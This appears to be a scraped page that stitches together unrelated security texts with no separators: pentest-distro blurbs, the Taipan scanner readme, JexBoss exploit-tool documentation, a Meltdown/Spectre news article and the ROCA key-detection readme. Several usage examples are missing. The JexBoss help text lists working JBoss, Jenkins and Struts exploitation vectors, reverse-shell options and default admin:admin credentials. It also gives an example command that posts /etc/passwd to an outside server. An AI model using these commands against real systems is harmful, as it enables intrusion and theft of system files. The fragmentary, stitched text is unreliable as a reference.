BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
Taipan is a an automated web application scanner which allows to identify web vulnerabilities in an automatic fashion. This project is the core engine of a broader project which include other components, like a web dashboard where you can manage your scan or download a PDF report and a scanner agent to run on specific host. Below are some screenshots of the Taipan dashboard:
If you are interested in trying the full product, you can contact: aparata[AT]gmail.com Download
Using Taipan Taipan can run on both Windows (natively) and Linux (with mono). To run it in Linux you have to install mono in version >= 4.8.0. You can track the implementation of the new features in the related Kanban board. Scan Profile Taipan allow to scan the given web site by specify different kind of profiles. Each profile enable or disable a specific scan feature, to show all the available profile just run Taipan with the --show-profiles option. Scan/Stop/Pause a scan During a scan you can interact with it by set the scan in Pause or Stop it if necessary. In order to do so you have to press:
P: pause the scan
S: stop the scan
R: resume a paused scan
The state change is not immediate and you have to wait until all threads have reached the desider state. Launch a scan To launch a new scan you have to provide the url and the profile which must be used. It is not necessary to specify the full profile name, a prefix is enough. Below an example of execution:
Taipan Components Taipan is composed of four main components:
Web Application fingerprinter: it inspects the given application in order to identify if it is a COTS application. If so, it extracts the identified version.
Hidden Resource Discovery: this component scans the application in order to identify resources that are not directly navigable or that shouldn't be accessed, like secret pages or test pages.
Crawler: This component navigates the web site in order to provide to the other components a list of pages to analyze. It allows to mutate the request in order to find not so common pathes.
Vulnerability Scanner: this component probes the web application and tries to identify possible vulnerabilities. It is composed of various AddOn in order to easily expand its Knowledge Base.
Features The tool and exploits were developed and tested for:
JBoss Application Server versions: 3, 4, 5 and 6.
Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)
The exploitation vectors are:
/admin-console
tested and working in JBoss versions 5 and 6
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6
Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
Servlet Deserialization
tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications
Others
Videos
Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss
Exploiting JBoss Application Server with JexBoss
Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)
Reverse Shell (meterpreter integration) After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:
When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. Usage examples
For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
--auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE
PERMISSION!!!)
--disable-check-updates, -D
Disable two updates checks: 1) Check for updates
performed by the webshell in exploited server at
http://webshell.jexboss.net/jsp_version.txt and 2)
check for updates performed by the jexboss client at
http://joaomatosf.com/rnp/releases.txt
-mode {standalone,auto-scan,file-scan}
Operation mode (DEFAULT: standalone)
--app-unserialize, -j
Check for java unserialization vulnerabilities in HTTP
parameters (eg. javax.faces.ViewState, oldFormData,
etc)
--servlet-unserialize, -l
Check for java unserialization vulnerabilities in
Servlets (like Invoker interfaces)
--jboss Check only for JBOSS vectors.
--jenkins Check only for Jenkins CLI vector.
--jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat
(CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
checked by default.
--proxy PROXY, -P PROXY
Use a http proxy to connect to the target URL (eg. -P
http://192.168.0.1:3128)
--proxy-cred LOGIN:PASS, -L LOGIN:PASS
Proxy authentication credentials (eg -L name:password)
--jboss-login LOGIN:PASS, -J LOGIN:PASS
JBoss login and password for exploit admin-console in
JBoss 5 and JBoss 6 (default: admin:admin)
--timeout TIMEOUT Seconds to wait before timeout connection (default 3)
Standalone mode:
-host HOST, -u HOST Host address to be checked (eg. -u
http://192.168.0.10:8080)
Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
--reverse-host RHOST:RPORT, -r RHOST:RPORT
Remote host address and port for reverse shell when
exploiting Java Deserialization Vulnerabilities in
application layer (for now, working only against *nix
systems)(eg. 192.168.0.10:1331)
--cmd CMD, -x CMD Send specific command to run on target (eg. curl -d
@/etc/passwd http://your_server)
--windows, -w Specifies that the commands are for rWINDOWS System$
(cmd.exe)
--post-parameter PARAMETER, -H PARAMETER
Specify the parameter to find and inject serialized
objects into it. (egs. -H javax.faces.ViewState or -H
oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
javax.faces.ViewState)
--show-payload, -t Print the generated payload.
--gadget {commons-collections3.1,commons-collections4.0,groovy1}
Specify the type of Gadget to generate the payload
automatically. (DEFAULT: commons-collections3.1 or
groovy1 for JenKins)
--load-gadget FILENAME
Provide your own gadget from file (a java serialized
object in RAW mode)
--force, -F Force send java serialized gadgets to URL informed in
-u parameter. This will send the payload in multiple
formats (eg. RAW, GZIPED and BASE64) and with
different Content-Types.
Auto scan mode:
-network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)
-ports PORTS List of ports separated by commas to be checked for
each host (eg. 8080,8443,8888,80,443)
-results FILENAME File name to store the auto scan results
File scan mode:
-file FILENAME_HOSTS Filename with host list to be scanned (one host per
line)
-out FILENAME_RESULTS
File name to store the file scan results
Unlike the initial reports
suggested about Intel chips being vulnerable to some severe ‘memory
leaking’ flaws, full technical details about the vulnerabilities have
now been emerged, which revealed that almost every modern processor
since 1995 is vulnerable to the issues.
Disclosed today by Google Project Zero,
the vulnerabilities potentially impact all major CPUs, including those
from AMD, ARM, and Intel—threatening almost all PCs, laptops, tablets,
and smartphones, regardless of manufacturer or operating system.
These hardware vulnerabilities have been categorized into two attacks, named Meltdown (CVE-2017-5754) and Spectre
(CVE-2017-5753 and CVE-2017-5715), which could allow attackers to steal
sensitive data which is currently processed on the computer.
Both attacks take advantage of a feature in chips known as "speculative
execution," a technique used by most modern CPUs to optimize
performance.
"In order to improve performance, many CPUs may choose to speculatively
execute instructions based on assumptions that are considered likely to
be true. During speculative execution, the processor is verifying these
assumptions; if they are valid, then the execution continues. If they
are invalid, then the execution is unwound, and the correct execution
path can be started based on the actual conditions," Project Zero says.
Therefore, it is possible for such speculative execution to have "side
effects which are not restored when the CPU state is unwound and can
lead to information disclosure," which can be accessed using
side-channel attacks.
Meltdown Attack
The first issue, Meltdown (paper),
allows attackers to read not only kernel memory but also the entire
physical memory of the target machines, and therefore all secrets of
other programs and the operating system.
“Meltdown is a related microarchitectural attack which exploits
out-of-order execution in order to leak the target’s physical memory.”
Meltdown uses speculative execution to break the isolation between user
applications and the operating system, allowing any application to
access all system memory, including memory allocated for the kernel.
“Meltdown exploits a privilege escalation vulnerability specific to
Intel processors, due to which speculatively executed instructions can
bypass memory protection.”
Nearly all desktop, laptop, and cloud computers affected by Meltdown.
Spectre Attack
The second problem, Spectre (paper),
is not easy to patch and will haunt people for quite some time since
this issue requires changes to processor architecture in order to fully
mitigate.
Spectre attack breaks the isolation between different applications,
allowing the attacker-controlled program to trick error-free programs
into leaking their secrets by forcing them into accessing arbitrary
portions of its memory, which can then be read through a side channel.
Spectre attacks can be used to leak information from the kernel to user
programs, as well as from virtualization hypervisors to guest systems.
“In addition to violating process isolation boundaries using native
code, Spectre attacks can also be used to violate browser sandboxing, by
mounting them via portable JavaScript code. We wrote a JavaScript
program that successfully reads data from the address space of the
browser process running it.” the paper explains.
“KAISER patch, which has been widely applied as a mitigation to the Meltdown attack, does not protect against Spectre.”
According to researchers, this vulnerability impacts almost every
system, including desktops, laptops, cloud servers, as well as
smartphones—powered by Intel, AMD, and ARM chips.
What You Should Do: Mitigations And Patches
Many vendors have security patches available for one or both of these attacks.
Windows — Microsoft has issued an out-of-band patch update
for Windows 10, while other versions of Windows will be patched on the
traditional Patch Tuesday on January 9, 2018
MacOS — Apple had already fixed most of these security holes
in macOS High Sierra 10.13.2 last month, but MacOS 10.13.3 will enhance
or complete these mitigations.
Linux —Linux kernel developers have also released patches by
implementing kernel page-table isolation (KPTI) to move the kernel into
an entirely separate address space.
Android —Google has released security patches for
Pixel/Nexus users as part of the Android January security patch update.
Other users have to wait for their device manufacturers to release a
compatible security update.
Mitigations for Chrome Users
Since this exploit can be executed through the website, Chrome users can
turn on Site Isolation feature on their devices to mitigate these
flaws.
Here's how to turn Site Isolation on Windows, Mac, Linux, Chrome OS or Android:
Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key.
Look for Strict Site Isolation, then click the box labeled Enable.
Once done, hitRelaunch Nowto relaunch your Chrome browser.
There is no single fix for both the attacks since each requires protection independently.
X509 Certificate, DER encoded, one per file, *.der, *.crt
X509 Certificate, PEM encoded, more per file, *.pem
RSA PEM encoded private key, public key, more per file, *.pem (has to have correct header -----BEGIN RSA...)
SSH public key, *.pub, starting with "ssh-rsa", one per line
ASC encoded PGP key, *.pgp, *.asc. More per file, has to have correct header -----BEGIN PGP...
APK android application, *.apk
one modulus per line text file *.txt, modulus can be a) base64 encoded number, b) hex coded number, c) decimal coded number
JSON file with moduli, one record per line, record with modulus has key "mod" (int, base64, hex, dec encoding supported) certificate(s) with key "cert" / array of certificates with key "certs" are supported, base64 encoded DER.
LDIFF file - LDAP database dump. Any field ending with ";binary::" is attempted to decode as X509 certificate
Java Key Store file (JKS). Tries empty password & some common, specify more with --jks-pass-file
PKCS7 signature with user certificate
The detection tool is intentionally one-file implementation for easy integration / manipulation. Pip install Install with pip (installs all dependencies)
pip install roca-detect
Local install Execute in the root folder of the package:
pip install --upgrade --find-links=. .
Dependencies It may be required to install additional dependencies so pip can install e.g. cryptography package. CentOS / RHEL:
# If installed with pip / manually
roca-detect --help
# Without installation (can miss dependencies)
python roca/detect.py
The testing tool accepts multiple file names / directories as the input argument. It returns the report showing how many files has been fingerprinted (and which are those). Example (no vulnerabilities found): Running recursively on all my SSH keys and known_hosts:
$> roca-detect ~/.ssh
2017-10-16 13:39:21 [51272] INFO ### SUMMARY ####################
2017-10-16 13:39:21 [51272] INFO Records tested: 92
2017-10-16 13:39:21 [51272] INFO .. PEM certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. DER certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. RSA key files: . 16
2017-10-16 13:39:21 [51272] INFO .. PGP master keys: 0
2017-10-16 13:39:21 [51272] INFO .. PGP total keys: 0
2017-10-16 13:39:21 [51272] INFO .. SSH keys: . . . 76
2017-10-16 13:39:21 [51272] INFO .. APK keys: . . . 0
2017-10-16 13:39:21 [51272] INFO .. JSON keys: . . . 0
2017-10-16 13:39:21 [51272] INFO .. LDIFF certs: . . 0
2017-10-16 13:39:21 [51272] INFO .. JKS certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. PKCS7: . . . . . 0
2017-10-16 13:39:21 [51272] INFO No fingerprinted keys found (OK)
2017-10-16 13:39:21 [51272] INFO ################################
Example (vulnerabilities found): Running recursively on all my SSH keys and known_hosts:
$> roca-detect ~/.ssh
2017-10-16 13:39:21 [51272] WARNING Fingerprint found in the Certificate
...
2017-10-16 13:39:21 [51272] INFO ### SUMMARY ####################
2017-10-16 13:39:21 [51272] INFO Records tested: 92
2017-10-16 13:39:21 [51272] INFO .. PEM certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. DER certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. RSA key files: . 16
2017-10-16 13:39:21 [51272] INFO .. PGP master keys: 0
2017-10-16 13:39:21 [51272] INFO .. PGP total keys: 0
2017-10-16 13:39:21 [51272] INFO .. SSH keys: . . . 76
2017-10-16 13:39:21 [51272] INFO .. APK keys: . . . 0
2017-10-16 13:39:21 [51272] INFO .. JSON keys: . . . 0
2017-10-16 13:39:21 [51272] INFO .. LDIFF certs: . . 0
2017-10-16 13:39:21 [51272] INFO .. JKS certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. PKCS7: . . . . . 0
2017-10-16 13:39:21 [51272] INFO Fingerprinted keys found: 1
2017-10-16 13:39:21 [51272] INFO WARNING: Potential vulnerability
2017-10-16 13:39:21 [51272] INFO ################################
PGP key In order to test your PGP key you can export it from your email client or download it from the PGP key server such as https://pgp.mit.edu/ You can also use gpg command line utility to export your public key:
Separate Python 2.7.13 We tested tool with Python 2.7.13 and it works (see Travis for more info). We have reports saying lower versions (<=2.6) do not work properly so we highly recommend using up to date Python 2.7 Use pyenv to install a new Python version locally if you cannot / don't want to update system Python. It internally downloads Python sources and installs it to ~/.pyenv.
Python 3 Basic testing routine is quite simple and works with Py3 but the rest of the code that processes the different key formats and extracts the modulus for inspection is not yet fully py3 ready. We are working on Py3 compatible version. Docker container Run via Docker container to avoid environment inconsistency. Dockerfile source can be audited at https://hub.docker.com/r/unnawut/roca-detect/.
docker run --rm -v /path/to/your/keys:/keys --network none unnawut/roca-detect
Make sure to use --rm and --network none flags to disable container's network connection and delete the container after running.